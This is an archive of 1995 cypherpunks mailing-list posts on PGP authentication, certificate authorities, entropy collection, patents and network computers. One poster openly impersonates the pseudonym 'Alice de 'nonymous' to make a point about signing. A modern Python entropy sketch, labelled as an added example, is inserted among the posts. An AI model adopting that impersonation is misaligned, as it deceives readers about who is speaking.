Harvard -- I thought that the study organizers might be able to get what
they needed from the Canadian FDA equivalent, Health & Welfare, Canada. 

(Disclaimer: Unofficially, of course, not speaking for Health & Welfare 
Canada.  I have absolutely no connection with anyone, anywhere or 
anything at all in any possible form whatsoever.  In fact this post may 
well be the product of random typing by a simian life form.)

Silly me.

The damn post never was posted.  It was either edited out of the data
stream, or something else nefarious occurred. 

I mailed the remailer-operator about this, and asked: "What's the problem?"
And the remailer operator didn't reply to the message. 

*Sigh* 

Now, no-one in Berkeley, not a cypherpunk of all people, could be opposed
to seeing marijuana legalized, now could they??  I mean not, California,
eh?? 

Maybe, I just couldn't figure out how to post, and how to use a 
remailer.  I don't know.  Or maybe I had one too many beers and should've
stuck to having sodas.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

P.P.S. (Come on down for a briefing to msri ... ya ... right ... 
        "persuasion" just isn't all that appetizing, Joe ... ;)  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 28 Nov 1995 22:22:44 +0800
To: cypherpunks@toad.com
Subject: Cypherpunk Certification Authority
Message-ID: <199511281400.GAA22636@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 28 Nov 1995, an impostor posing as Alice de 'nonymous wrote:

> On Sun, 26 Nov 1995, Perry E. Metzger wrote:
> 
> > Someone spoofing Alice, who is either Detweiler or "Dr." Cohen, says:
> > > I have never signed any of my posts to this mailing list and frankly have
> > > no intention of beginning at this point.
> > 
> > Well, signed Alice posts have shown up, so we will just have to assume
> > that the above was a spoof and that the signed Alice posts are the
> > real ones, now won't we?
> 
> Perry.  Normally I try my best to ignore you.
> 
> But I will simply repeat, I have never signed a post, and have no 
> intention of beginning to sign any posts, until I establish a secure 
> machine in a secure complex that is dedicated to that purpose.

This insistence on not making use of authentication tools at the same
time as whining about people spoofing you is what caused me to assume
your identity.  You were given ample warning.

Consider it a demonstration of why you should do just what you are
stubbornly refusing to do: generate yourself a damn key!

It is the best way to ensure a persistent persona whilst retaining
anonymity.

> I like to think that I take my security somewhat seriously.

For a purportedly security conscious impostor, you sure are reluctant
to make use of simple authentication tools.  Your risk assesment is
seriously out of whack too.

You do *not* need a secure machine to improve the level of
authentication of your posts: signing your posts would provide better
authentication than no authentication, even if the machine is not
tempest shielded, nor in a secure installation.

Finding your machine (we don't know remember), and installing a kernel
patch to catch your passphrase as it is typed in, or snag it from PGPs
core image is much harder to achieve, even if you are using a multi
user system.

PGP signing your post will give a much better authentication than
people who post from known email addresses; forgeries, and machine
breakins are not that hard to effect.

> And I would ask whoever DID post the PGP key under my name, to please
> issue a revocation certificate.

Oh so you do care about authentication :-)

An offer: you post your own key, and I'll post a revocation.

You might find that people take you more seriously once they know they
are talking to a persistent persona.

Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLsT3obu8OQjKS7RAQE62gQAoTxWo6Dipa1bZeNi5NygZ/9CLJ2pn44s
KN2TFWY0n1KPC4tibEM88GOI7vHCCLE8t/XQ2zx5YArjd/7toCidAlUY07vQ6ums
sL4J8oV4JDKdpq9WTWaTS/unBww8qBJRVDBHigtiOneIkmu6kfuBEh0JR+a5plfQ
00GQ4SfcyBk=
=SAXZ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 28 Nov 1995 14:36:44 +0800
To: cypherpunks@toad.com
Subject: No Subject
In-Reply-To: <nanomius@netcom.com>
Message-ID: <Pine.BSD.3.91.951128061214.23333A-100000@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



   well, if it is not the world's greatest thinker and knowledge bearer 
on Nostradamus posting an announcement on a message we've already seen 
at least twice, and hashed.

   read the threads before you post!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 28 Nov 1995 20:55:16 +0800
To: cypherpunks@toad.com
Subject: (fwd) Netscape V2 and Certificates
Message-ID: <v02120d06ace0b53ee92e@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

From: John Hemming CEO MarketNet <JohnHemming@mkn.co.uk>
Date: Thu, 23 Nov 1995 18:54:36 PM PST
To: www-buyinfo@allegra.att.com
Mime-Version: 1.0
Subject: Netscape V2 and Certificates

We have now spent an interesting time looking at Netscape V2.

If you are interested in looking at V2 and how it relates to certificates
not signed by Verisign please take version 0.15b of Workhorse at
ftp://193.119.26.70/mktnet/pub/horse.zip  (Windows 3.1) switch on
the WWW server and try it out.

Basically the client allows an SSL link to a server "signed" by a CA
that it does not know ("EuroSign") the only problem being that if it
does not know the CA then it cannot check the signature.

I do think this is a major improvement, however, in that it raises
properly the issue of authentication of servers and makes it clear
that the client user should properly consider the server.

At the end of the day the commercial strengths of the server merchant and its
authorisation is more important than who has signed its certificate.  I can
happily obtain certificates for MarketNet even though there is a
US MarketNet Corp.  This is because I have a UK organisation called
MarketNet.  The name, therefore, is not in itself significant.

It is also interesting that Netscape will be checking the domain name in
the near future.  Realistically many people have a large number of
different domain names all pointing at the same server so a generic domain name
is likely to be the most common registration anyway.

At Eurosign.com we will be offering free Certification of a Keypair.  We
wish to ensure that further certification actually means something
commercially viable (eg a Bank regulated by the relevant organisation).
However, as our first offering we will be simply certifying that we have
received valid certificate requests. (they will be short term certs, however)

We have not fully allocated our domain name as yet (as far as I have
been told) although the experimental server (not advised for live use as
there are a number of flaws) was released today.  Eurosign's alpha
test site is at http://193.118.187.106/

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 28 Nov 1995 21:54:10 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <199511281032.CAA21495@jobe.shell.portal.com>
Message-ID: <199511281340.IAA13518@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Someone pretending to be Alice has said:
> On Sun, 26 Nov 1995, Perry E. Metzger wrote:
> > Well, signed Alice posts have shown up, so we will just have to assume
> > that the above was a spoof and that the signed Alice posts are the
> > real ones, now won't we?
[...]
> But I will simply repeat, I have never signed a post,

Perhaps *you* have never signed a post, but how do we know who *you*
are. You could be someone we've never heard from before. Anyone could
be putting the Alice de 'nonymous signature on the bottom of something
they've written. The only way to know for sure is digital signatures.

> And I would ask whoever DID post the PGP key under my name, to please
> issue a revocation certificate. 

How do we know you aren't just spoofing us?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 28 Nov 1995 22:19:42 +0800
To: wlkngowl@unix.asb.com
Subject: Re: A random-noise sampling device for DOS
In-Reply-To: <DIr6B1.4yn@news2.new-york.net>
Message-ID: <199511281407.JAA13573@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



wlkngowl@unix.asb.com writes:
> I'm working on a random noise sampling device for DOS, and so far have
> a prototype version that samples the keyboard timings.  I'm unsure of
> a good way to implement it...
> 
> Device timings (and in the future periodic samplings of the mouse
> position or sound-card noise input) are put into a ring-buffer of raw
> data and the output is a straight secure hash of it...  (when the
> output buffer is used it, it just rehashes the data in the buffer at
> the moment...)

Doesn't sound good.

> I'm looking for some advice on how to determine when the raw data has
> been "used up" and worth processing/encrypting before re-hashing it...

What I would suggest is accumulating enough data that you think you
have enough entropy for one hash function's worth of output, hash it,
and put that into an output queue. Then don't reuse the data, or if
you do, reuse it in combination with enough new data that you think
the new data has one hash function output's worth of entropy.

Perry
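
An added example, not part of either post and not the DOS driver's code: a Python sketch of the accumulate-then-hash scheme suggested above, next to a model of the rehash-the-ring-buffer design from the quoted post. SHA-256, the one-bit-per-sample entropy credit, the class and function names, and the constructed timing values are all assumptions made for illustration.

```python
import hashlib
from collections import deque

HASH_BYTES = hashlib.sha256().digest_size   # 32 bytes per hash output
HASH_BITS = HASH_BYTES * 8                  # 256 bits of entropy needed per output


class NaiveRehashDevice:
    """Model (an interpretation) of the quoted design: each read hashes
    whatever raw samples are in the ring buffer at that moment."""

    def __init__(self, ring_size=64):
        self._ring = deque(maxlen=ring_size)

    def add_sample(self, delta_ticks):
        self._ring.append(delta_ticks & 0xFFFFFFFF)

    def read(self):
        raw = b"".join(d.to_bytes(4, "little") for d in self._ring)
        return hashlib.sha256(raw).digest()


class EntropyAccumulator:
    """Credits each sample with a conservative amount of entropy, hashes the
    pool only once it holds one hash output's worth, and never emits from
    the same raw data twice."""

    def __init__(self, bits_per_sample=1.0, carry_forward=True):
        self._bits_per_sample = bits_per_sample   # assumed credit, tune per source
        self._carry_forward = carry_forward
        self._pool = hashlib.sha256(b"pool")
        self._credited = 0.0
        self._last_delta = None
        self._out = bytearray()

    def add_sample(self, delta_ticks):
        delta = delta_ticks & 0xFFFFFFFF
        # Every sample is mixed in, but a repeat of the previous interval
        # (for example keyboard auto-repeat) earns no entropy credit.
        self._pool.update(delta.to_bytes(4, "little"))
        if delta != self._last_delta:
            self._credited += self._bits_per_sample
        self._last_delta = delta
        if self._credited >= HASH_BITS:
            self._flush()

    def _flush(self):
        state = self._pool.digest()
        # Output and chaining values are derived under different labels, so
        # seeing the output does not reveal what seeds the next pool.
        self._out += hashlib.sha256(b"out" + state).digest()
        self._pool = hashlib.sha256(b"pool")
        if self._carry_forward:
            # Old data is reused only in combination with a full new
            # 256 bits of credited samples, since the credit restarts at zero.
            self._pool.update(hashlib.sha256(b"chain" + state).digest())
        self._credited = 0.0

    def available(self):
        return len(self._out)

    def read(self, n):
        """Return up to n queued bytes; a short or empty result means the
        caller must wait for more samples."""
        chunk = bytes(self._out[:n])
        del self._out[:n]
        return chunk


def constructed_timings(n):
    """Constructed stand-in for inter-keystroke timer deltas (not real data)."""
    return [(i * 7919 + 13) % 1000 + 50 for i in range(n)]


if __name__ == "__main__":
    samples = constructed_timings(600)

    naive = NaiveRehashDevice()
    for d in samples[:64]:
        naive.add_sample(d)
    print("naive repeats output with no new input:", naive.read() == naive.read())

    acc = EntropyAccumulator()
    for d in samples:
        acc.add_sample(d)
    print("bytes queued after 600 samples:", acc.available())
    print("first block:", acc.read(HASH_BYTES).hex())
```
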




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted_Anderson@transarc.com
Date: Tue, 28 Nov 1995 22:31:54 +0800
To: Hal <weidai@eskimo.com>
Subject: Re: towards a theory of reputation
In-Reply-To: <Pine.SUN.3.91.951121223454.2539A-100000@eskimo.com>
Message-ID: <okilg2z0BwwMA0mAFp@transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


I am far behind in my C'punks reading and am likely to get farther
behind before I catch up, so perhaps this is well-known or dated. 
However, the recent revival of reputation discussion reminded me of a
very interesting claim made by Miller & Drexler in "Comparative Ecology:
A Computational Perspective"
(http://www.webcom.com/~agorics/agorpapers.html).  I'll quote from
section 4: 
> ... Trademarking of services and products enables producers to establish
> valuable reputations. The lack of this mechanism in biology [17]
> contributes to the relative sparseness of symbiosis there. 

> 4.4. Food webs and trade webs 

> Biological and market ecosystems both contain a mixture of symbiotic and
> negative-sum relationships. This paper argues that biological ecosystems
> involve more predation, while idealized market ecosystems involve more
> symbiosis. Indeed, one can make a case that this is so even for human
> market ecosystems-that biological ecosystems are, overall, dominated by
> predation, while market ecosystems are, overall, dominated by symbiosis. 

> In human markets (as in idealized markets) producers within an industry
> compete, but chains of symbiotic trade connect industry to industry.
> Competition in biology likewise occurs most often among those occupying
> the same niche, but here, it is predation that connects from niche to
> niche. Because of the lack of reputations and trademarks, symbiosis in
> biology occurs most often in situations where the "players" find
> themselves in a highly-iterated game. In the extreme, the symbiotic
> system itself becomes so tightly woven that it is considered a single
> organism-as with lichens composed of fungi and algae, or animals
> composed of eukaryotic cells containing mitochondria. Predation, of
> course, links one symbiotic island to the next. 

> Ecology textbooks show networks of predator-prey relationships-called
> food webs-because they are important to understanding ecosystems;
> "symbiosis webs" have found no comparable role. Economics textbooks show
> networks of trading relationships circling the globe; networks of
> predatory or negative-sum relationships have found no comparable role.
> (Even criminal networks typically form cooperative "black markets".) One
> cannot prove the absence of such spanning symbiotic webs in biology, or
> of negative-sum webs in the market; these systems are too complicated
> for any such proof. Instead, the argument here is evolutionary: that the
> concepts which come to dominate an evolved scientific field tend to
> reflect the phenomena which are actually relevant for understanding its
> subject matter. 

> [17] Wickler, Wolfgang, Mimicry in Plants and Animals (World University
> Library/ McGraw-Hill, New York, 1968). 

This collection of Miller&Drexler papers is very much worth reading if
you haven't run across it yet. 

Ted 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Rose <Greg_Rose@sydney.sterling.com>
Date: Tue, 28 Nov 1995 07:15:10 +0800
To: cme@clark.net
Subject: Re: establishing trust
In-Reply-To: <199511270516.AAA05126@clark.net>
Message-ID: <pgpmoose.199511280943.49404@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain


Carl M. Ellison wrote:
  Did you intentionally not provide the same key that this was signed with?
  I added the key you provided, but PGP still couldn't find the right key for
  this signature.

I think we've discovered another potential nasty.
I accidentally sent out the SECRET key not the
public key. I believe the problem you suffered was
because it added it to secring not pubring.

No I'm not going to make the passphrase public. I
apologise for any inconvenience to people who
added this to their secring.pgp, it was certainly
not intentional on my part to do this to people.
You should probably delete it.

Greg.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Tue, 28 Nov 1995 23:21:18 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: [NOISE, sorta] Re: Inexpensive Crypto Boxes...
In-Reply-To: <199511280454.WAA00361@einstein.ssz.com>
Message-ID: <9511281504.AA26594@outland>
MIME-Version: 1.0
Content-Type: text/plain



	Hi fellow PSX owner!  Tried WipEouT yet? :)

> The new Sony Play Station is operating under a stripped down Unix.
> Considering the speed that these boxes are designed to run at it seems a
> natural for somebody to come up with a crypto workbench on ROM to install in
> one of these babies. Could program one of the game controller ports as a
> serial port and hook it to a Linux box (for example).

	For those who don't know, the PSX is a CD based gaming console
released (in the US) in Sept by Sony.  It's a MIPS R3000/25MHz processor
with some SGI-designed polygon chips, 2x CD-ROM, 1M RAM, 2M video RAM.

	As for serial port, why bother with the game port when there's
a serial I/O port on the back (the link cable that lets you hook two
PSXen up to play head to head (Mmmmm, Destruction Derby)).  What would be
_really_ spiffy would be for Sony (or a 3rd party) to put out a "hack disk"
(for lack of a better name) that would have a bare bones kernel that you
could then download stuff from another platform (gcc cross-compiled from
your linux box for example).  Like that'll happen.

	The line between toy and real machine is getting more and 
more fuzzy (we use a box here at work with the same processor to compile
for an AT&T telephony switch (which tells you how sad the AT&T product
is :) :))).  How long until the NSA tries a Chinese Lottery attack hidden
inside a Nintendo cart?

	Ah well, I've rambled enough.

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rajaram@morgan.com (P. Rajaram)
Date: Tue, 28 Nov 1995 23:39:54 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Certificate Authorities?
In-Reply-To: <01BABCAF.9CDAE5C0@csasaki>
Message-ID: <9511281004.ZM4257@morgan.com>
MIME-Version: 1.0
Content-Type: text/plain


On Nov 27,  4:46pm, Jeff Weinstein wrote:
> Subject: Re: Certificate Authorities?

>   If you want a static list of CAs that netscape products
> will accept, you will be disappointed.  In the future
> there will be more commercial CAs, many companies will run
> their own internal CAs, and information providers will
> provide certs to their subscribers to handle access
> control to their sites.  It is a losing battle to try
> to maintain a static list of CAs.  IMHO, Going with a more
> dynamic, user configurable approach is the only way to
> keep up.

Yes.  But...
I deal with the security infrastructure for a large corporation.
I want only security administrators to configure the list of acceptable CAs.
I specifically do not want our users to be able to add new CAs
to the list of trusted "approved" CAs.

The concern is that some users who are not crypto enthusiasts may be
"social engineered" into adding a very liberal CA to their list.
Once this happens, the browser's signature verification capability
is totally compromised.

This is one of the reasons why PGP has not been adopted by many large
companies.  In response, Viacrypt now seems to have a product that
can restrict user modifications to the public keyring.

-raj




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Patiwat Panurach <pati@ipied.tu.ac.th>
Date: Tue, 28 Nov 1995 12:25:50 +0800
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: Money: Back to the Future?
In-Reply-To: <199511250137.CAA12316@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.91.951128111736.25709D-100000@ipied.tu.ac.th>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 25 Nov 1995, Anonymous wrote:

> money and credit. The Eulopean system of central banks
> has produced an advisory report outlining a possible
> regulatory response, and in this countly some Fed

Does anybody know if this advisory report can be found on the net?

-------------------------------------------------------------------------------
Patiwat Panurach      	     Whatever you can do, or dream you can, begin it.
eMAIL: pati@ipied.tu.ac.th      Boldness has genius, power and magic in it.
m/18 junior Fac of Economics		-Johann W.Von Goethe
--JiuJitsu-CellularPhreaking-SukhotaiHistory-Perl-WWWDataIntegration-Puroresu--







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com
Date: Tue, 28 Nov 1995 21:47:42 +0800
To: cypherpunks@toad.com
Subject: A random-noise sampling device for DOS
Message-ID: <DIr6B1.4yn@news2.new-york.net>
MIME-Version: 1.0
Content-Type: text/plain



I'm working on a random noise sampling device for DOS, and so far have
a prototype version that samples the keyboard timings.  I'm unsure of
a good way to implement it...

Device timings (and in the future periodic samplings of the mouse
position or sound-card noise input) are put into a ring-buffer of raw
data and the output is a straight secure hash of it...  (when the
output buffer is used it, it just rehashes the data in the buffer at
the moment...)

I'm looking for some advice on how to determine when the raw data has
been "used up" and worth processing/encrypting before re-hashing it...

This in mind, offers for eventual beta-testers (announcement will
follow when it's ready), or suggestions for features (what to sample,
device interfaces) would be helpful.

Thanks in advance,

Rob <wlkngowl@unix.asb.com>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Patiwat Panurach <pati@ipied.tu.ac.th>
Date: Tue, 28 Nov 1995 20:31:27 +0800
To: John Young <jya@pipeline.com>
Subject: Re: The future will be easy to use (fwd)
In-Reply-To: <199511280309.WAA10578@pipe3.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.951128151201.28240E-100000@ipied.tu.ac.th>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 27 Nov 1995, John Young wrote:

> >Don't hold your breath. The current market surveys say 
> >that there is no  market for them. Check out this weeks 
> >PC Week or Mac Week, as they both  have several 
> >articles discussing this. Bottom line is that the under 
> >$1000  computer seems to have no future either in 
> >industry or the home.
> 
> Peter Lewis reports in today's NYT on "doubts about the fantasy 
> of a $500 'Network PC' " but quotes Eric Schmidt of Sun saying, 

I was using a Commodore 64 and a 300 bps modem for networking to the old
online services of the day.  That whole setup cost less than 300 dollars
at the time, and had a disk drive too.  I guess it would be feasible to
make a really cheap machine, fit it with a more modern modem and connect
it to the internet.

I feel sad when they say that the market for <1000 $ machines is nil, I 
had so much fun and learned so much from my old machines.

-------------------------------------------------------------------------------
Patiwat Panurach      	     Whatever you can do, or dream you can, begin it.
eMAIL: pati@ipied.tu.ac.th      Boldness has genius, power and magic in it.
m/18 junior Fac of Economics		-Johann W.Von Goethe
-------------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 29 Nov 1995 05:20:54 +0800
To: cypherpunks@toad.com
Subject: Re: The future will be easy to use
In-Reply-To: <199511272224.QAA20539@spirit.sctc.com>
Message-ID: <iP99eD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


zuhn@sctc.com (david d `zoo' zuhn) writes:
> On the technical side, what piece of software do we need for privacy?

One thing that David didn't mention is security add-ons to the "network
computers" that are supposed to be rolled out within the next few months --
the successors to X terminals, $500 boxes with a good screen/sound,
cheap cpu, and a few megs of ram and flash memory to hold a web browser.
I expect some folks to make a good living by writing add-ons (including
crypto add-ons) to these gizmos.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 29 Nov 1995 15:14:47 +0800
To: Carl Ellison <raph@c2.org
Subject: Re: The future will be easy to use
Message-ID: <199511290659.WAA19886@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:03 PM 11/28/95 EST, Carl Ellison wrote:
>That's true.  What the user would have to see is some icon (or, for
>text-bound folks, a temporary unique string) until the user chooses and
>assigns the appropriate alias.  That icon would have no meaning by itself.
>It would acquire a meaning by being associated with some message or set of
>messages:

Better method:  Creator of the key names it:  Usually after himself or
his role:  The recipient's key database detects and resolves cases 
where two different keys have identical names in accordance with
certification rules.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 29 Nov 1995 15:21:52 +0800
To: Carl Ellison <raph@c2.org
Subject: Re: The future will be easy to use
Message-ID: <199511290707.XAA24211@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:30 PM 11/28/95 EST, Carl Ellison wrote:
> Of course.  This isn't the base case.  We would have some keys which I sign
> based on my own personal knowledge; things handed to me by people I know;
> some possibly published in the paper where the real key owner would see the
> claim and be able to contest it.

You are making the same erroneous assumption that Phil made when he
designed the Web of trust:  You assume that it is important and 
interesting to link key ID's to physical bodies.  This is usually
not the case:  Linking key ID's to home web pages etc is not only 
easier -- it is also usually more interesting and important.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 30 Nov 1995 03:13:43 +0800
To: cypherpunks@toad.com
Subject: Re: Elliptic curves, patent status?
Message-ID: <199511290717.XAA29808@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:16 PM 11/28/95 -0400, Michael Smith wrote:
>
> I'm unclear about the patent status of elliptic curve 
> systems. Are they covered by the Diffie-Hellman patent? 
> That is, is the language of this patent broad enough to 
> cover _all_ public-key systems, regardless of their 
> mathematical basis? 

No, but RSA will litigate you with the objective of
inflicting extravagant legal costs regardless.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "(Bill)" <vwbug@iadfw.net>
Date: Wed, 29 Nov 1995 03:43:27 +0800
To: cypherpunks@toad.com
Subject: Who has the right to read your e-mail? Old hash, but I need to ask.
Message-ID: <2.2b7.32.19951128125813.00679628@server.iadfw.net>
MIME-Version: 1.0
Content-Type: text/plain


A recent incident brought this up at work.
If someone could point me to a site that would help explain the ins and outs 
of the laws regarding the following -

Who has the right to read your personal e-mail?
E-mail created at work?
E-mail downloaded at work?
E-mail stored on a PC at work? 

Thanks 
vwbug@iadfw.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 29 Nov 1995 03:45:22 +0800
To: stevenw@best.com (Steven Weller)
Subject: Re: The future will be easy to use (fwd)
In-Reply-To: <v01530506ace05744708d@[206.86.1.35]>
Message-ID: <199511281329.IAA13468@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Steven Weller writes:
> >Realistically, who in their right mind would buy a diskless workstation to
> >connect to Internet?
> 
> The same sort of things could be said of the telephone compared with
> written correspondence. Why would anyone have one in their business or
> home? Anyone can overhear a conversation, people will just chat, the only
> thing you can do with it is talk, there is no record of the correspondence,
> why would anyone want to talk to people on the other side of town? etc.

This is different. In an era of distributed processing, they are
returning you to the mainframe model. I don't see that this can work
very well. Considering how much more powerful a $1000 machine is, why
would you want something half that price that can do one hundredth as
much for you?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 30 Nov 1995 01:09:34 +0800
To: dan@milliways.org (Dan Bailey)
Subject: Re: Elliptic curves, patent status?
Message-ID: <199511291651.IAA20813@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



At 05:16 PM 11/28/95 -0400, Michael Smith wrote:
> > > I'm unclear about the patent status of elliptic curve 
> > > systems. Are they covered by the Diffie-Hellman patent? 
> > > That is, is the language of this patent broad enough to 
> > > cover _all_ public-key systems, regardless of their 
> > > mathematical basis? 

On Mon, 27 Nov 1995 23:16:10 -0800 jamesd@echeque.com wrote:
> > No, but RSA will litigate you with the objective of
> > inflicting extravagant legal costs regardless.

At 08:13 AM 11/29/95 EST, Dan Bailey wrote:
> Does the patent create any headaches for elliptic curve research or
> publishing elliptic curve papers, or just for new products?

Patents do not prohibit research -- Yet.

Patent law continues to be extravagantly reinterpreted from time to
time, in a way that continually increases the power of the patent
office and the power of the courts, but this creativity has not 
yet collided drastically with freedom of speech.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 30 Nov 1995 01:39:56 +0800
To: amp <cypherpunks@toad.com>
Subject: Re: The future will be easy to use
Message-ID: <199511291715.JAA04720@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:20 AM 11/30/95 -0500, amp wrote:
>unfortunately, it appears to me that if you _really_ want encryption
>to be universal, it's gotta be done on windoze, it's gotta be
>point-n-click and seamless to the mail application. 

Which, at present, means it's gotta be done on Pegasus.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 30 Nov 1995 01:35:45 +0800
To: cypherpunks@toad.com
Subject: Re: The future will be easy to use
Message-ID: <199511291715.JAA04769@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



>James A. Donald writes

>> Specs, anyone?
>>
>> I suggest a few requirements:
>>
>> Store the keys, and information about the keys in a *real* database
>> ...

At 09:31 AM 11/29/95 -0500, Jack P. Starrantino wrote:
> Is this worth the complexity/cost? I'd have thought that the amount of
> data involved would be small enough that index hashing would be
> overkill, and I can't think of any operations that would require a full
> up db engine.

I think you envisage communicating with a few other revolutionaries,
drug traffickers, etc, whereas I envisage a future where every man is
his own bank and his own credit rating agency.

More immediately, any extension to the web of trust to enable it to
function for anything more interesting and important than
logical-to-physical identity (and who gives a tinker's damn about
logical-to-physical identity) will require a real database, or
will be painful without a real database.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 30 Nov 1995 01:34:57 +0800
To: Carl Ellison <cme@TIS.COM>
Subject: Re: The future will be easy to use
Message-ID: <199511291715.JAA04804@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain





>>At 01:03 PM 11/28/95 EST, Carl Ellison wrote:
>>>That's true.  What the user would have to see is some icon (or, for
>>>text-bound folks, a temporary unique string) until the user chooses and
>>>assigns the appropriate alias.  That icon would have no meaning by itself.
>>>It would acquire a meaning by being associated with some message or set of
>>>messages:

"James A. Donald" <jamesd@echeque.com>
>>Better method:  Creator of the key names it

At 10:55 AM 11/29/95 EST, Carl Ellison wrote:
> it
> might also be non-unique, making it worthless as an identifier.

Then your database should detect this non-uniqueness, and qualify
the displayed name with additional information, preferably additional
information that helps you address the question of "Is this the
same identity who has changed his key, or is it an accidental
collision, or is it a malevolent spoof?"

